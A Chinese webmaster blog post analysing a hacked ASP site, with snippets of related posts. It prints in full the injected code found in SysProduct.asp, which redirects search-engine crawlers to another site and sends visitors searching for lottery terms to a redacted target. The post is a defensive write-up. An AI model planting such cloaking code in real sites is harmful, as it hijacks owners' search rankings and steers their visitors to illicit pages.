Categories


Tags


百度快照是如何被黑客篡改的

写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第1张

前几日,我的客户电话说自己的百度排名没有了,查询下竟然百度标签显示的内容是一家违禁词平台的网站内容。 我知道网站被黑客加入了非法代码,恶意篡改了百度快照。(截图如下)

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第2张

查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第3张

1、黑客是如何修改百度快照的呢?

我进行了排查,客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

路径:Inc文件夹—SysProduct.asp文件里面最底下添加了如下代码:

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第4张

<%

function Getbot()

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT")

if instr(1,s_agent,"googlebot",1) > 0 then

GetBot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

GetBot="baidu"

end if

end function

if GetBot="baidu" or GetBot="google" then

'

Response.Redirect "http://*********"(跳转的网站,引导百度抓取的内容)

else

'

Response.Write"<script type=""text/javascript"">var d=document.referrer;var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%AE%98%E7%BD%91|%E4%B8%A4%E5%85%83%E5%BD%A9%E7%A5%A8%E5%B9%B3%E5%8F%B0))/;if(re.test(d)){self.location='http://*********';(目标网站)window.adworkergo='ad_app6'}else{}</script>"

end if

%>

黑客设置的这串代码导致百度爬虫抓取网页的时候,直接抓取越过客户网站抓取了跳转网站内容,导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

2、那么黑客是如何进入后台的呢?

黑客要进入后台,必须知道FTP账户和密码,以及IP地址。

造成的原因有如下几种:

1)一方面是FTP密码设置的时候比较简单化,很容易被利用软件破解掉,

2)另一方面选择便宜的空间也是一种隐患。因为空间IP以及用户名是很难被知道的,除非有人提供。

3、网站被黑之后,你如何追查黑客的来源?

方法比较简单,就是查询你跳转的目标网站的域名信息。一般情况下,都是一些小型的站长开发的赚钱网站,通过查询域名信息你可以获知该域名的归属人是谁,他有可能就是黑你网站的人。

如果是比较大型的网站利用外包的方式进行推广,那么你也可以得知负责人,给百度或者是网络警察举报一下,该网站存在恶意攻击修改内容的行为,毕竟它也有一定得责任。

通过中国万网Whois域名查询:比如我客户跳转的违禁词网站的域名信息如下:

百度快照是如何被黑客篡改的 百度 网站安全 经验心得 第5张

1)第一个是:注册人

2)第二个是:联系电话

3)第三个是:联系邮箱

基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话,建议你通过以下方式进行维权:

违法和不良信息举报中心:http://net.china.cn/

12321网络不良与垃圾信息举报受理中心:http://www.12321.cn/

国家互联网应急中心网络安全举报中心:http://www.cert.org.cn/

中国反钓鱼网站联盟认定及处理流程: http://www.cnnic.cn/

公安部信息网络安全报警网站:http://www.cyberpolice.cn/wfjb/

中国扫黄打非网:http://www.shdf.gov.cn/

北京市公安局网络违法犯罪举报网站:http://www.bj.cyberpolice.cn/index.jsp

希望本篇文章对你防黑有帮助。

感谢【网牛天下】的精彩分享

来源:卢松松博客


Public @ 2018-08-25 15:37:31

发现自己网站被黑,如何解决?

发现自己网站被黑的情况,应该尽快采取措施解决。以下是一些可能的应对措施: 1. 立即关闭网站:如果发现黑客入侵,尤其是有危害和威胁的,应该立即关闭网站,阻止黑客进行更多的恶意活动。 2. 紧急备份网站数据:在关闭网站之前获取尽可能多的数据备份,以确保数据不会丢失或被修改。 3. 更新安全软件:更新所有安全软件和应用程序以确保它们是最新的,并且存在安全漏洞已被修复。 4. 更改密码:更改所有

Public @ 2023-04-27 11:50:18

网站被黑花样多 提高警惕免忧祸

网络黑客攻击网站是一种比较常见的现象,它们可利用不同的方法、技术和工具,来破坏或窃取网站的安全,为了防止网站信息泄露、网站瘫痪甚至被黑给网站带来损失,网站管理人员需要做好有效的防御措施。 首先,建立一个可靠的安全系统,包括访问控制策略和操作审计等,以提高网站的安全性;其次,让网站服务器及时进行系统更新及补丁,以免系统里的漏洞被黑客利用;再次,经常进行网站安全测试,主动发现安全漏洞,及时修补;

Public @ 2023-02-24 06:48:26

[原创]百度提示您:该页面可能因黑客侵入而存在安全风险

作为一个智能AI语言模型,我无法确认您提供的信息的真实性和准确性。但是根据常识和网络安全经验,如果您在访问一个网页时看到这样的提示,说明该网页可能存在安全风险,可能会泄露您的个人信息或遭受黑客攻击。建议您不要轻易访问或泄露任何个人敏感信息,并尽快关闭该网页。同时,您也可以采用一些常见的网络安全措施,如使用杀毒软件、防火墙、VPN等来保护自己的网络安全。

Public @ 2023-06-21 04:00:09

网站被黑首页没有了怎么恢复

问:网站三个月前被黑过,技术处理完之后排名恢复了一周左右又没了一直到现在,之前搜网址还可以搜到,这几天首页收录也没了,死链提交了两个月还没删掉,快照投诉也没反应,反馈了客服让检查网站安全问题,技术检查过说没问题,到底怎么才能恢复啊哭!大佬帮我看看好吗答:1、死链返回是404码后期都会删除;2、百度回复的没有问题,你的被黑的产生的不存在的URL快照要想删除,你的页面必须是死链,死链返回码是404,当

Public @ 2013-06-23 15:37:32

更多您感兴趣的搜索

0.484408s